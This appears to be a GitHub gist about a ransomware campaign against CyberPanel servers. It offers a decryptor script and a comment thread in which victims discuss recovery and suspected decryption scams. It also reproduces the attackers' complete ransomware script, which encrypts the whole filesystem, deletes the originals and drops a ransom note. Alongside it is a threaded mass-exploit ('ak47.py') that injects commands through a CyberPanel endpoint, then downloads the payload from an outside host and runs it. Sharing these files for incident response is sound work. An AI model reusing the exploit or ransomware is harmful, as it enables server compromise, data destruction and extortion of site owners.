cyberpanel 0day leaked attack script

00-README.md

CyberPanel ransomware attack/defense

WARNING: Please use good judgement and extra caution before downloading and running something provided in the comment section of this gist.

This repo contains 3 things:

• A decryption script for .psaux ransoms
• A link to a decryptor for .encrypt ransoms
• A list of files found on the PSAUX attack server

Ransomware status

We are currently aware of 3 separate groups encrypting CyberPanel instances. The extension they leave are:

• .psaux -> Custom ransomware, script based, decryptor available
• .encryp -> Variant from Babuk's source, decryptor available
• .locked -> C3RB3R Conti v3-based Ransomware, decryptor status unknown

Decryption

If your server was only targeted by PSAUX and files have the .psaux extension, due to a flaw in PSAUX's implementation, you should be able to use the decrypter 1-decrypt.sh

If your server was only targeted by the .encryp ransomware, you can use encryp_dec.out provided by v0idxyz.

1-decrypt.sh

#!/bin/bash

######################################################################################
#                    LeakIX PSAUX CyberPanel Ransom campaign decrypter               #
#                                                                                    #
#                    You have been blessed by PSAUX                                  #
#                                                                                    #
#                    All your files can be decrypted.                                #
#                                                                                    #
#                                                                                    #
# Telegram: @psauxsec                                                                #
#                                                                                    #
# Fun must be made on that channel for weak crypto,                                  #
#                                                                                    #
#  Ransomware Rushed by PSAUX                                                        #
#                                                                                    #
######################################################################################

# WARNING, WE ARE AWARE OF MULTIPLE ENCRYPTION ATTACKS. THIS SCRIPT WORKS WHEN YOUR FILES ARE ENCRYPTED WITH .psaux EXTENSION
# WARNING, ALWAYS WORK ON A COPY OF YOUR DATA, ENCRYPTED OR NOT
# WARNING, THIS SCRIPT WILL RESTORE FILES FROM THE TIME THEY WERE ENCRYPTED, BACKUP ANY CHANGES MADE AFTER THE HACK


### Fail the script if anything's wrong, that's people's data we're dealing with
set -e

echo "Running PSAUX CyberPanel decrypter..."

### Master key gently provided by PSAUX

MASTER_KEY="-----BEGIN PRIVATE KEY-----
MIIEvQIBADANBgkqhkiG9w0BAQEFAASCBKcwggSjAgEAAoIBAQDFiVLFtwUUcizD
4gUkRJayJQFAW79ZojEE8YLLnfF5x5Z1A2hP/qT21LMOmvMz03gu9Jn3G+Iby8cx
4OtvUDuG0tx+Cbq2u2lJj+ZmL11mMMbbR9aTWZhGmdVY3T9X2dObJSV94F5Itd3s
SSf4A+Osb2Ea2Ci6BCK6mCXw7Qrwr4epWuwUiZ2JqfX3Iv5oLmwLOKF/nOM0XzIp
fyopK10C/Di5erPBIAV2SYQh7sZ0JKRH7biL+s9dPM2e+8Ckuvkqkb1O1lIpOh8j
8N/dxn/y9w53KGYsSOaN0ZHseBNCbIwW1s22q4iG/p5d+UG+kTRc8HqdmENw65Vv
S8ycNPnZAgMBAAECggEBAIRgjZ7AEuBrz0IKIqX2bQK/N8J4eZhI0A7fBmcL1npk
3ZhXCz2oicZ8Le6Yumi9y6mz88Yc4n78JeZwM3aqTuoAPxEb1guFNn68t4s9LJtC
DtF+p/ahMSIHD2l5A20NJfivgRuFE8ooTqt9LxLPEHFLRsjlmQ1nnhprweleAVnf
Kl66kGZa/lAF99P7g4+3/hukVHMRPKCCEmc/77bgIw7gXe/lRutFReraGdziGky3
VkDIx7MUdGp+n4Hf4iqtUzpinN0IlvgFiMvH4aoAr5vDHitEOGuaovyeA51c2qJw
RGIAJPgWdaKj7yJl65uLmZPLxel2MCrOHqn8jv1zzw0CgYEA47kmxIT9JXoH3r0y
kxxgzR+W9FiIM+MP01F2IfoELNXP0yCZ5sSQ2p+gT61wwTZWvzmzkE8w+AcsJirs
ntlTyG5pJNQYTBSJW9lRoXykpgyRyhpEy7OES1NlWslWM2kthJQ/XZiAfaJ504ZL
cw4q3PhvcSofknRyYpLEYJ8nyg8CgYEA3hCYarpOrDxN55TB5rdU7adX4b6faK2z
NuV/grn8qqpG4nB1jj8tQI5q1NTzBe4ngLdJ6+uyGln7WvIr0llaCnhJo2Yp4EhX
5vNw3cKSdlJynZtp3k9FidhMfjrzzX3d7q7n3BFk/UgUPMRDM85q3qZzSEqLy3wI
G/WCqmMNhZcCgYBOFKMFSPAflHr0VXzs0hMi4gz5VQ3GdLltZIYT2kzqLpmms4vx
gz6Dp63pA/ggV4hg4uD9vxl0QclSgO9G/A9tLuZgWVTHaVc7pgUGUN2HjdHDMUSb
b78RsNOU0Gn9ELgpuEcNyYdtDHOnImnmVlo+D/TuIVpX9hNuVxJ8arXS4wKBgC5I
MSwVVm5JR0db1qnaTeYWOZfAHgM4KKDpZhD96G49fPaWz7ls62aICDYBiAEVaMBH
8y0re3xIgr2quX1myABkn5xhn5qyGTf2RvDBK7tjZaX5jTAbP3gCT7cDXGrYr9ee
No7ERVMQob8kfIkgnV94O5C2kLpBSINjQO94I4pTAoGASChZYdSvI46zNc8EnlcD
G7V1y3S8/Yxg3Nf7wl+s5Qot6CBRmlOOlMMQQ0JQgT5YZWcTM0IP5fEiiO6rt+w/
zHSS1/V+QNyxwb3nZhxwe0yWyqBKvDfmmxI0pRal7L6RZE9tqh40tn+Ksw4ykg5R
yROWtY+JIbuJJb26/Z5/4KQ=
-----END PRIVATE KEY-----"
echo "$MASTER_KEY" > /tmp/private.pem

MASTER_KEY_PATH="/tmp/private.pem"

# Decrypt the encryption key with the master key
openssl pkeyutl -decrypt -inkey /tmp/private.pem -in /var/key.enc -out /tmp/key.enc
openssl pkeyutl -decrypt -inkey /tmp/private.pem -in /var/iv.enc -out /tmp/iv.enc

local_key=$(cat /tmp/key.enc|xxd -p)
local_iv=$(cat /tmp/iv.enc|xxd -p)

echo "Recovered key: $local_key IV: $local_iv"


# Find all psaux file and decrypt them
find / -name "*.psaux" -type f|while read file; do
  openssl enc -aes-128-cbc -d -K ${local_key} -iv ${local_iv} -in "${file}" -out "${file%\.psaux}" && rm "${file}"
  echo "Restored ${file%\.psaux}"
done

actually.sh

#!/usr/bin/env bash

private="-----BEGIN PRIVATE KEY-----
MIIEvQIBADANBgkqhkiG9w0BAQEFAASCBKcwggSjAgEAAoIBAQDFiVLFtwUUcizD
4gUkRJayJQFAW79ZojEE8YLLnfF5x5Z1A2hP/qT21LMOmvMz03gu9Jn3G+Iby8cx
4OtvUDuG0tx+Cbq2u2lJj+ZmL11mMMbbR9aTWZhGmdVY3T9X2dObJSV94F5Itd3s
SSf4A+Osb2Ea2Ci6BCK6mCXw7Qrwr4epWuwUiZ2JqfX3Iv5oLmwLOKF/nOM0XzIp
fyopK10C/Di5erPBIAV2SYQh7sZ0JKRH7biL+s9dPM2e+8Ckuvkqkb1O1lIpOh8j
8N/dxn/y9w53KGYsSOaN0ZHseBNCbIwW1s22q4iG/p5d+UG+kTRc8HqdmENw65Vv
S8ycNPnZAgMBAAECggEBAIRgjZ7AEuBrz0IKIqX2bQK/N8J4eZhI0A7fBmcL1npk
3ZhXCz2oicZ8Le6Yumi9y6mz88Yc4n78JeZwM3aqTuoAPxEb1guFNn68t4s9LJtC
DtF+p/ahMSIHD2l5A20NJfivgRuFE8ooTqt9LxLPEHFLRsjlmQ1nnhprweleAVnf
Kl66kGZa/lAF99P7g4+3/hukVHMRPKCCEmc/77bgIw7gXe/lRutFReraGdziGky3
VkDIx7MUdGp+n4Hf4iqtUzpinN0IlvgFiMvH4aoAr5vDHitEOGuaovyeA51c2qJw
RGIAJPgWdaKj7yJl65uLmZPLxel2MCrOHqn8jv1zzw0CgYEA47kmxIT9JXoH3r0y
kxxgzR+W9FiIM+MP01F2IfoELNXP0yCZ5sSQ2p+gT61wwTZWvzmzkE8w+AcsJirs
ntlTyG5pJNQYTBSJW9lRoXykpgyRyhpEy7OES1NlWslWM2kthJQ/XZiAfaJ504ZL
cw4q3PhvcSofknRyYpLEYJ8nyg8CgYEA3hCYarpOrDxN55TB5rdU7adX4b6faK2z
NuV/grn8qqpG4nB1jj8tQI5q1NTzBe4ngLdJ6+uyGln7WvIr0llaCnhJo2Yp4EhX
5vNw3cKSdlJynZtp3k9FidhMfjrzzX3d7q7n3BFk/UgUPMRDM85q3qZzSEqLy3wI
G/WCqmMNhZcCgYBOFKMFSPAflHr0VXzs0hMi4gz5VQ3GdLltZIYT2kzqLpmms4vx
gz6Dp63pA/ggV4hg4uD9vxl0QclSgO9G/A9tLuZgWVTHaVc7pgUGUN2HjdHDMUSb
b78RsNOU0Gn9ELgpuEcNyYdtDHOnImnmVlo+D/TuIVpX9hNuVxJ8arXS4wKBgC5I
MSwVVm5JR0db1qnaTeYWOZfAHgM4KKDpZhD96G49fPaWz7ls62aICDYBiAEVaMBH
8y0re3xIgr2quX1myABkn5xhn5qyGTf2RvDBK7tjZaX5jTAbP3gCT7cDXGrYr9ee
No7ERVMQob8kfIkgnV94O5C2kLpBSINjQO94I4pTAoGASChZYdSvI46zNc8EnlcD
G7V1y3S8/Yxg3Nf7wl+s5Qot6CBRmlOOlMMQQ0JQgT5YZWcTM0IP5fEiiO6rt+w/
zHSS1/V+QNyxwb3nZhxwe0yWyqBKvDfmmxI0pRal7L6RZE9tqh40tn+Ksw4ykg5R
yROWtY+JIbuJJb26/Z5/4KQ=
-----END PRIVATE KEY-----"
echo "$private" > /var/private.pem

key_name="s2zp8fks9a0L"
echo "Encryption ID: ${key_name}"

PRIVATE_KEY_PATH="/var/private.pem"

if [ ! -f "$PRIVATE_KEY_PATH" ]; then
  echo "Private key not found at $PRIVATE_KEY_PATH"
  exit 1
fi

PRIVATE_KEY=$(cat $PRIVATE_KEY_PATH)
if [ -z "$PRIVATE_KEY" ]; then
  echo "Could not read the private key (maybe permission issue?)"
  exit 1
fi
echo "Private Key SSL: $(echo "$PRIVATE_KEY" | head -n 1)..."

login_message="


######################################################################################
#               Encryptions ID : ${key_name}                                         #                
#                    You have been hacked by PSAUX                                   #
#                                                                                    #
#                    All your files have been encrypted.                             #
#                                                                                    #
# To restore access, you can contact us in Telegram                                  #
#                                                                                    #
# Telegram: @psauxsec                                                                #
#                                                                                    #
# Payment must be made in cryptocurrency.                                            #
#                                                                                    #
# The price for decryption is 200 dollars.                                           #
# Sample decryption can be served upon request.                                      #
#                                                                                    #
# After payment, you will receive a key to run the decrypter script                  #
# on your system to restore your files.                                              #
# All your database is downloaded and if you are not going to pay in next 3 days     #
# its going to be published in darknet. Best Regards!                                #
#                                                                                    #
#                                                                                    #
#                                                                                    #
#  Ransomware Made by PSAUX                                                          #
#                                                                                    #
######################################################################################


"
echo "$login_message" > /etc/motd

key=$(openssl rand -hex 16)
iv=$(openssl rand -hex 16)
echo "Generated key: ${key}"
echo "Generated IV: ${iv}"

echo -n $key | xxd -r -p | openssl pkeyutl -encrypt -inkey $PRIVATE_KEY_PATH -out /var/key.enc
if [ $? -eq 0 ]; then
    echo "Key encrypted successfully: /var/key.enc"
else
    echo "Error with key encryption"
    exit 1
fi

echo -n $iv | xxd -r -p | openssl pkeyutl -encrypt -inkey $PRIVATE_KEY_PATH -out /var/iv.enc
if [ $? -eq 0 ]; then
    echo "IV encrypted successfully: /var/iv.enc"
else
    echo "Error with IV encryption"
    exit 1
fi

excluded_dirs=(
    "/proc"
    "/sys"
    "/dev"
    "/run"
    "/etc"
    "/usr"
    "/tmp"
    "/var/run"
    "/var/lock"
    "/var/tmp"
    "/mnt"
    "/sbin"
    "/lib64"
    "/bin"
    "/boot"
    "/lib"
    "/lib32"
    "/srv"
    "/libx32"
    "/media"
    "/lost+found"
)

excluded_files=(
    "/var/key.enc"
    "/var/iv.enc"
    "/var/decrypter.sh"
    "/var/index_template.html"
)

is_excluded() {
    local path=$1
    for excluded in "${excluded_dirs[@]}"; do
        if [[ "$path" == "$excluded"* ]]; then
            return 0
        fi
    done
    for excluded in "${excluded_files[@]}"; do
        if [[ "$path" == "$excluded" ]]; then
            return 0
        fi
    done
    return 1
}

encrypt_directory() {
    local dir=$1
    echo "Encrypting directory: $dir"
    find "$dir" -type f -print0 | while IFS= read -r -d '' file; do
        if ! is_excluded "$file"; then
            echo "Encrypting file: $file"
            openssl enc -aes-128-cbc -K "$key" -iv "$iv" -in "$file" -out "${file}.psaux"
            if [ $? -eq 0 ]; then
                echo "[+] : ${file}.psaux"
                rm -f "$file"
            else
                echo "Error encrypting: $file"
            fi
        else
            echo "Excluded file: $file"
        fi
    done
}

encrypt_directory "/"

find / -type d \( -path /proc -o -path /sys -o -path /dev -o -path /run -o -path /tmp -o -path /var/run -o -path /var/lock -o -path /var/tmp -o -path /mnt -o -path /media -o -path /lost+found \) -prune -o -type d -print0 | while IFS= read -r -d '' dir; do
    if ! is_excluded "$dir"; then
        cp /var/index_template.html "$dir/index.html"
    fi
done

find / -type f \( -path /proc -o -path /sys -o -path /dev -o -path /run -o -path /tmp -o -path /var/run -o -path /var/lock -o -path /var/tmp -o -path /mnt -o -path /media -o -path /lost+found -o -name "*.psaux" -o -name "index.html" -o -name "decrypter.sh" \) -prune -o -type f -print0 | while IFS= read -r -d '' file; do
    if ! is_excluded "$file"; then
        echo "[+] : $file"
        openssl enc -aes-128-cbc -K "$key" -iv "$iv" -in "$file" -out "${file}.psaux"
        if [ $? -eq 0 ]; then
            echo "[+] : ${file}.psaux"
            rm -f "$file"
        else
            echo "Error encrypting: $file"
        fi
    else
        echo "Excluded file: $file"
    fi
done

rm -- "$0" && exit 0

ak47.py

import httpx
import sys
import time
from concurrent.futures import ThreadPoolExecutor, as_completed

def get_CSRF_token(client):
    try:
        resp = client.get("/")
        if resp.status_code == 200:
            return resp.cookies.get('csrftoken')
        else:
            print(f"Failed to connect to {client.base_url}. Status code: {resp.status_code}")
            return None
    except httpx.RequestError:
        print(f"Failed to connect to {client.base_url}")
        return None

def pwn(client, CSRF_token, cmd):
    if not CSRF_token:
        return "No CSRF token"

    headers = {
        "X-CSRFToken": CSRF_token,
        "Content-Type": "application/json",
        "Referer": str(client.base_url)
    }
    
    payload = '{"statusfile":"/dev/null; %s; #","csrftoken":"%s"}' % (cmd, CSRF_token)
    try:
        response = client.put("/dataBases/upgrademysqlstatus", headers=headers, data=payload)
        if response.headers.get("Content-Type", "").startswith("application/json"):
            return response.json().get("requestStatus", "No response")
        else:
            print(f"Unexpected response type from {client.base_url}: {response.text}")
            return "Unexpected response"
    except httpx.RequestError:
        return "Failed to execute"

def execute_command(client, command):
    CSRF_token = get_CSRF_token(client)
    if not CSRF_token:
        print(f"Could not retrieve CSRF token from {client.base_url}")
        return "Failed to retrieve CSRF token"
    
    print(f"Executing: {command} on {client.base_url}")
    stdout = pwn(client, CSRF_token, command)
    print(stdout)
    return stdout

def process_target(target):
    print(f"Processing target: {target}")
    try:
        client = httpx.Client(base_url=target, verify=False, timeout=5.0)

        # Step 1: Download the file
        if "Failed" in execute_command(client, "curl -L https://www.paste.tc/raw/asd-41506 -o /var/actually.sh"):
            return
        
        # Step 2: Check if the file exists, retry if necessary
        file_exists = False
        while not file_exists:
            response = execute_command(client, "ls /var/actually.sh")
            if "No such file or directory" not in response:
                file_exists = True
                print("File found. Proceeding with further steps...")
            else:
                print("File not found. Waiting for the download to complete...")
                time.sleep(2)  # Wait for 2 seconds before checking again

        # Step 3: Change permissions for the downloaded file
        execute_command(client, "chmod +x /var/actually.sh")

        # Step 4: Remove any carriage return issues
        execute_command(client, "sed -i 's/\r//g' /var/actually.sh")

        # Step 5: Execute the script with nohup to detach and log to /dev/null
        execute_command(client, "nohup /var/actually.sh")

        print("Script executed and detached.")
    except httpx.RequestError as e:
        print(f"Could not connect to {target}. Error: {str(e)}")

def main(targets_file, max_threads=5):
    try:
        with open(targets_file, "r") as file:
            targets = [line.strip() for line in file if line.strip()]

        with ThreadPoolExecutor(max_threads) as executor:
            future_to_target = {executor.submit(process_target, target): target for target in targets}

            for future in as_completed(future_to_target):
                target = future_to_target[future]
                try:
                    future.result()
                except Exception as exc:
                    print(f"{target} generated an exception: {exc}")

    except FileNotFoundError:
        print(f"Error: File {targets_file} not found.")
        sys.exit(1)

if __name__ == "__main__":
    if len(sys.argv) < 2:
        print("Usage: python3 ak48.py targets.txt [max_threads]")
        sys.exit(1)

    targets_file = sys.argv[1]
    max_threads = int(sys.argv[2]) if len(sys.argv) > 2 else 5

    main(targets_file, max_threads)

auth.log

Oct 29 12:01:15 ready sshd[2293619]: Accepted password for root from 188.119.27.24 port 31771 ssh2
Oct 29 12:35:48 ready sshd[2294265]: Accepted password for root from 188.119.27.24 port 30923 ssh2
Oct 29 13:25:23 ready sshd[2294914]: Accepted password for root from 188.119.27.24 port 31508 ssh2
Oct 29 14:04:22 ready sshd[2295536]: Accepted password for root from 188.119.27.24 port 31502 ssh2
Oct 29 14:15:47 ready sshd[2296023]: Accepted password for root from 188.119.27.24 port 31334 ssh2

ssh-authorized_keys

ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAsrBV2UGqNIQ8iL3j3/yh+qi7Q76plJteqTmS2EdQ4A8HR6yckuRnyr5s0UVDI/eiAZpiNKDDpipwULl22Sih96vFOJkKpON5bxQ4NwUFQ7Fq7wheBK9PBQ5owuBrOqIeY3D846kNejNJhDOcIiDYN9KqCeP+EGlKTFb68/nifQkPychx+z4MEm39pB7CKS+EFXsOoCmBntb7wduZf0spLtstd+bTSFxwbdgSNQU2iabazLYG05LQWTc4+Zv574Wt4608PjGE2uyofxO69XFtiYy9LvNtzmLOlJYy89M3HdQgfGzrWVC8QLLsZvuQsrRPDFb4/2/KJ5KyT9rg7qGeQQ== Suphachai

Please anyone that has found a possible means of communicating with the hackers of .locked encryption should please message me here: [email protected] please I desperately need solutions right now. I have no backups for some very critical files...

what database do you used. if you are using mysql, there is a chance to recover your data using .ibd file from /var/lib/mysql

Please anyone that has found a possible means of communicating with the hackers of .locked encryption should please message me here: [email protected] please I desperately need solutions right now. I have no backups for some very critical files...

what database do you used. if you are using mysql, there is a chance to recover your data using .ibd file from /var/lib/mysql

I also have .ibd files i need to recover. alongside others but they have been encrypted also
do you have any possible solutions for me
please contact me if you have any solutions for me

I created this script to help me recover MySQL databases using .ibd files. Feel free to modify it to suit your needs.

Instructions

1. Download Database Files: Copy all .ibd files from /var/lib/mysql on the infected server.
2. Restore Server: Restore a previous working version of your server and upload the .ibd files to /home/mysql on the server.
3. Run Script: Execute the script after updating it with your MySQL root password.

Note: I'm not an expert; this approach worked for me, but results may vary. Reach out if you need further guidance: [email protected].

#!/bin/bash

# Function to prompt for the database name
prompt_for_input() {
    read -p "Enter database name: " database_name
    echo
}

MYSQL_ROOT_PASSWORD="{your root password}"

# Define the list of tables to recover
tables=("users" "wallets")

# Backup existing .ibd files from the target database
backup_existing_table() {
    echo "Backing up existing .ibd files..."

    for table in "${tables[@]}"; do
        original_file="/var/lib/mysql/${database_name}/${table}.ibd"
        backup_file="/home/dumps/${database_name}_backup_${table}.ibd"

        if [ -f "$original_file" ]; then
            cp "$original_file" "$backup_file" || { echo "Failed to backup ${table}.ibd"; exit 1; }
            echo "${table}.ibd backed up successfully."
        else
            echo "${table}.ibd not found in the original location."
        fi
    done
}

# Replace .ibd files in MySQL directory with recovered files
replace_files() {
    echo "Replacing .ibd files..."

    for table in "${tables[@]}"; do
        source_file="/home/mysql_backup/${database_name}/${table}.ibd"
        dest_file="/var/lib/mysql/${database_name}/${table}.ibd"

        if [ -f "$source_file" ]; then
            mv "$source_file" "$dest_file" || { echo "Failed to move ${table}.ibd"; exit 1; }
            echo "${table}.ibd moved successfully."
        else
            echo "${table}.ibd not found. Skipping..."
        fi
    done
}

# Discard tablespaces and drop indexes to prepare for import
clear_tablespace() {
    echo "Preparing tablespaces..."

    sudo mysql -u root -p"${MYSQL_ROOT_PASSWORD}" -e "SET GLOBAL FOREIGN_KEY_CHECKS = 0;"
    sudo mysql -u root -p"${MYSQL_ROOT_PASSWORD}" -e "USE ${database_name}; ALTER TABLE users DISCARD TABLESPACE;"
    sudo mysql -u root -p"${MYSQL_ROOT_PASSWORD}" -e "USE ${database_name}; ALTER TABLE wallets DISCARD TABLESPACE;"
    sudo mysql -u root -p"${MYSQL_ROOT_PASSWORD}" -e "SET GLOBAL FOREIGN_KEY_CHECKS = 1;"
}

# Import tablespaces from replaced .ibd files
import_tablespace() {
    echo "Importing tablespaces..."

    sudo mysql -u root -p"${MYSQL_ROOT_PASSWORD}" -e "SET GLOBAL FOREIGN_KEY_CHECKS = 0;"
    sudo mysql -u root -p"${MYSQL_ROOT_PASSWORD}" -e "USE ${database_name}; ALTER TABLE users IMPORT TABLESPACE;"
    sudo mysql -u root -p"${MYSQL_ROOT_PASSWORD}" -e "USE ${database_name}; ALTER TABLE wallets IMPORT TABLESPACE;"
    sudo mysql -u root -p"${MYSQL_ROOT_PASSWORD}" -e "SET GLOBAL FOREIGN_KEY_CHECKS = 1;"
}

# Test database recovery by selecting sample records
test_recovery() {
    echo "Testing database recovery..."

    mysql -u root -p"${MYSQL_ROOT_PASSWORD}" -e "
    USE ${database_name};
    SELECT * FROM users LIMIT 1;
    SELECT * FROM wallets LIMIT 1;
    "

    echo "Recovery completed. Verify if data is accessible."
}

# Main function to run the recovery process
main() {
    prompt_for_input
    backup_existing_table
    clear_tablespace
    replace_files
    import_tablespace
    test_recovery
}

# Run the main function
main

This may work for normal .ibd files.
In our case, .ibd files are not the usual ones
They have been encrypted as other files by the hackers.
This will only give you a MySql Error cause MySql won't understand whatever file format is contained in the .ibd files cause they have been encrypted

golbd, there are guys that can decrypt this but are asking too much money for me 5000 to 7000usd, i got .locked files and send them some locked files and after one hour they send me back the files decrypted... so they have the decryption key but they want to make money....

@Gabitzzup please can you send me your contact so I can reach you.
you can send here please: [email protected]

I recently managed to recover two of my servers with the same issue. If anyone needs assistance or would like details on the recovery method, feel free to reach out. SQL files are indeed recoverable with some specific recovery techniques. You can email me your details at [email protected], and I'll do my best to help.

I recently managed to recover two of my servers with the same issue. If anyone needs assistance or would like details on the recovery method, feel free to reach out. SQL files are indeed recoverable with some specific recovery techniques. You can email me your details at [email protected], and I'll do my best to help.

reached out, no one's answering, looks like a scam.

As sad as it sounds, I think the .locked files have been lost for years.

I have also recovered databases from ibd files and babuk decryptor mentioned above. I had copied the files from home and mysql directories before destroying the VPS and recreating it thinking that I will have to set up the entire websites from zero. But the websites are working normally again finally from restored databases. This comment is to let people know that these scripts really do wonders. Thanks to the original creators.

I have also recovered databases from ibd files and babuk decryptor mentioned above. I had copied the files from home and mysql directories before destroying the VPS and recreating it thinking that I will have to set up the entire websites from zero. But the websites are working normally again finally from restored databases. This comment is to let people know that these scripts really do wonders. Thanks to the original creators.

How did you recovered from the ibd files ? i copied mysql folder and it's safe not locked ...

Decrypt frm and other files in mysql folder.
Then reinstall the same version of cyberpanel on a test server, replace the original files with your backup. Now create backup sql files (dumps) from mysql for each database and import to your new server.

Sound easy MBK87234 - how to decrypt frm files???? We are locked with .locked and .L0CK3D.

Yeaa yesterday we make new install UBUNTU and then new version of CYBERPANEL. Today morning - server is down - so Cyberpanel is like a big hole right now.... dont use it.

Decrypt frm and other files in mysql folder. Then reinstall the same version of cyberpanel on a test server, replace the original files with your backup. Now create backup sql files (dumps) from mysql for each database and import to your new server.

No encrypted files on mysql folder

Sound easy MBK87234 - how to decrypt frm files???? We are locked with .locked and .L0CK3D.

No, decryptor for .locked files is not yet available. In my case it was .encryp so I was lucky.

hi, has anyone had any success decrypting .encryp? i have tried using https://github.com/v0idxyz/babukencrypdecrytor but im not getting any luck. Please help with guidance

Sound easy MBK87234 - how to decrypt frm files???? We are locked with .locked and .L0CK3D.

No, decryptor for .locked files is not yet available. In my case it was .encryp so I was lucky.

man how did you manage to decrypt .encryp? some of my files were encrypted using this format?

@jajonsraviation use the encryp_dec.out to decrypt .encryp files, worked for me........ Make sure to only run it on a copy of data

Sound easy MBK87234 - how to decrypt frm files???? We are locked with .locked and .L0CK3D.

No, decryptor for .locked files is not yet available. In my case it was .encryp so I was lucky.

man how did you manage to decrypt .encryp? some of my files were encrypted using this format?

Can you please share a sample file. Upload it to google drive or some other place and share the link so that I can take a look at it because otherwise it is difficult to say why it didnt work.

golbd, there are guys that can decrypt this but are asking too much money for me 5000 to 7000usd, i got .locked files and send them some locked files and after one hour they send me back the files decrypted... so they have the decryption key but they want to make money....

@Gabitzzup could you share the contacts of these people, lets see what we can negotiate and work out with them this will be deeply appreciated.. Thanks

Hi guys , i didnt respond, till now , but now i have news.... i negotiate with them for 550usd first one after a week can not deliver the decryption key so the man is legit never ask for money.
the other one that actually decrypt test files drop from 7000 to 550usd after a week but took the money and ask for more... so is a thief and i think is behind the attack or knows the attackers i will give his contact to be aware:
https://www.youtube.com/watch?v=UIUZGWjxaSg
[email protected]

https://t.me/RansomRescue
https://ransomrescue.org/
it has many names and many logos

golbd, there are guys that can decrypt this but are asking too much money for me 5000 to 7000usd, i got .locked files and send them some locked files and after one hour they send me back the files decrypted... so they have the decryption key but they want to make money....

@Gabitzzup could you share the contacts of these people, lets see what we can negotiate and work out with them this will be deeply appreciated.. Thanks

Hi guys , i didnt respond, till now , but now i have news.... i negotiate with them for 550usd first one after a week can not deliver the decryption key so the man is legit never ask for money. the other one that actually decrypt test files drop from 7000 to 550usd after a week but took the money and ask for more... so is a thief and i think is behind the attack or knows the attackers i will give his contact to be aware: https://www.youtube.com/watch?v=UIUZGWjxaSg [email protected]

https://t.me/RansomRescue https://ransomrescue.org/ it has many names and many logos

you could have asked to decrypt the test file any.

Yeaa yesterday we make new install UBUNTU and then new version of CYBERPANEL. Today morning - server is down - so Cyberpanel is like a big hole right now.... dont use it.

there wasn't the slightest doubt in my mind, the developers are in cahoots with the scammers, determined to make money or they would have notified you about the hack.

golbd, there are guys that can decrypt this but are asking too much money for me 5000 to 7000usd, i got .locked files and send them some locked files and after one hour they send me back the files decrypted... so they have the decryption key but they want to make money....

@Gabitzzup could you share the contacts of these people, lets see what we can negotiate and work out with them this will be deeply appreciated.. Thanks

Hi guys , i didnt respond, till now , but now i have news.... i negotiate with them for 550usd first one after a week can not deliver the decryption key so the man is legit never ask for money. the other one that actually decrypt test files drop from 7000 to 550usd after a week but took the money and ask for more... so is a thief and i think is behind the attack or knows the attackers i will give his contact to be aware: https://www.youtube.com/watch?v=UIUZGWjxaSg [email protected]
https://t.me/RansomRescue https://ransomrescue.org/ it has many names and many logos

you could have asked to decrypt the test file any.

The test files was decrypted this is why i agree...

golbd, there are guys that can decrypt this but are asking too much money for me 5000 to 7000usd, i got .locked files and send them some locked files and after one hour they send me back the files decrypted... so they have the decryption key but they want to make money....

@Gabitzzup could you share the contacts of these people, lets see what we can negotiate and work out with them this will be deeply appreciated.. Thanks

Hi guys , i didnt respond, till now , but now i have news.... i negotiate with them for 550usd first one after a week can not deliver the decryption key so the man is legit never ask for money. the other one that actually decrypt test files drop from 7000 to 550usd after a week but took the money and ask for more... so is a thief and i think is behind the attack or knows the attackers i will give his contact to be aware: https://www.youtube.com/watch?v=UIUZGWjxaSg [email protected]
https://t.me/RansomRescue https://ransomrescue.org/ it has many names and many logos

you could have asked to decrypt the test file any.

The test files was decrypted this is why i agree...

Sadly unlucky, I got all my files back.

golbd, there are guys that can decrypt this but are asking too much money for me 5000 to 7000usd, i got .locked files and send them some locked files and after one hour they send me back the files decrypted... so they have the decryption key but they want to make money....

@Gabitzzup could you share the contacts of these people, lets see what we can negotiate and work out with them this will be deeply appreciated.. Thanks

Hi guys , i didnt respond, till now , but now i have news.... i negotiate with them for 550usd first one after a week can not deliver the decryption key so the man is legit never ask for money. the other one that actually decrypt test files drop from 7000 to 550usd after a week but took the money and ask for more... so is a thief and i think is behind the attack or knows the attackers i will give his contact to be aware: https://www.youtube.com/watch?v=UIUZGWjxaSg [email protected]
https://t.me/RansomRescue https://ransomrescue.org/ it has many names and many logos

you could have asked to decrypt the test file any.

The test files was decrypted this is why i agree...

Also attached the readme.txt file and I can decrypt 1 file, too) By the way, send those who do not spare your link to restore 1 file, we'll check if there is any key binding in the encryption.

https://t.me/RansomRescue they can't do anything, they're crooks.

golbd, there are guys that can decrypt this but are asking too much money for me 5000 to 7000usd, i got .locked files and send them some locked files and after one hour they send me back the files decrypted... so they have the decryption key but they want to make money....

@Gabitzzup could you share the contacts of these people, lets see what we can negotiate and work out with them this will be deeply appreciated.. Thanks

Hi guys , i didnt respond, till now , but now i have news.... i negotiate with them for 550usd first one after a week can not deliver the decryption key so the man is legit never ask for money. the other one that actually decrypt test files drop from 7000 to 550usd after a week but took the money and ask for more... so is a thief and i think is behind the attack or knows the attackers i will give his contact to be aware: https://www.youtube.com/watch?v=UIUZGWjxaSg [email protected]
https://t.me/RansomRescue https://ransomrescue.org/ it has many names and many logos

you could have asked to decrypt the test file any.

The test files was decrypted this is why i agree...

Also attached the readme.txt file and I can decrypt 1 file, too) By the way, send those who do not spare your link to restore 1 file, we'll check if there is any key binding in the encryption.

so, You are saying that I can send you one file and you will decrypt it? how can I contact you and how much it costs for more than one file?

golbd, there are guys that can decrypt this but are asking too much money for me 5000 to 7000usd, i got .locked files and send them some locked files and after one hour they send me back the files decrypted... so they have the decryption key but they want to make money....

@Gabitzzup could you share the contacts of these people, lets see what we can negotiate and work out with them this will be deeply appreciated.. Thanks

Hi guys , i didnt respond, till now , but now i have news.... i negotiate with them for 550usd first one after a week can not deliver the decryption key so the man is legit never ask for money. the other one that actually decrypt test files drop from 7000 to 550usd after a week but took the money and ask for more... so is a thief and i think is behind the attack or knows the attackers i will give his contact to be aware: https://www.youtube.com/watch?v=UIUZGWjxaSg [email protected]
https://t.me/RansomRescue https://ransomrescue.org/ it has many names and many logos

you could have asked to decrypt the test file any.

The test files was decrypted this is why i agree...

Also attached the readme.txt file and I can decrypt 1 file, too) By the way, send those who do not spare your link to restore 1 file, we'll check if there is any key binding in the encryption.

so, You are saying that I can send you one file and you will decrypt it? how can I contact you and how much it costs for more than one file?

you have this feature in your test reference file

Unfortunately, I have been infected with the locked virus, is there any way to solve it?

Unfortunately, I have been infected with the locked virus, is there any way to solve it?

what is the file extension?